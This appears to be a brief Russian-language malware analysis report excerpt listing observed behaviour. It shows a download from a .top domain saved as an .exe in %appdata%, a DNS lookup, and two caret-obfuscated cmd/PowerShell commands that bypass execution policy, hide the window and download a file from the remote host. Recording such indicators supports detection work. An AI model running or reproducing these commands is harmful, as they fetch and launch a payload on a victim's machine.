Техническая информация
- http://folueaport.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^ow^e^RSHE^LL^.e^xE^ -eXeCu^TIo^n^POLI^cY ^Bypass^ ^-^n^Op^ROF^iLE -^wi^NDo^wSTyLe ^hI^dde^N (^NEW-O^bJecT^ s^yst^em.nEt.weB^C^l^i^En^T).dO^wNloADFI^L^E(^'http://folueap...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /C "p^ow^e^RSHE^LL^.e^xE^ -eXeCu^TIo^n^POLI^cY ^Bypass^ ^-^n^Op^ROF^iLE -^wi^NDo^wSTyLe ^hI^dde^N (^NEW-O^bJecT^ s^yst^em.nEt.weB^C^l^i^En^T).dO^wNloADFI^L^E(^'http://folueap...' (со скрытым окном)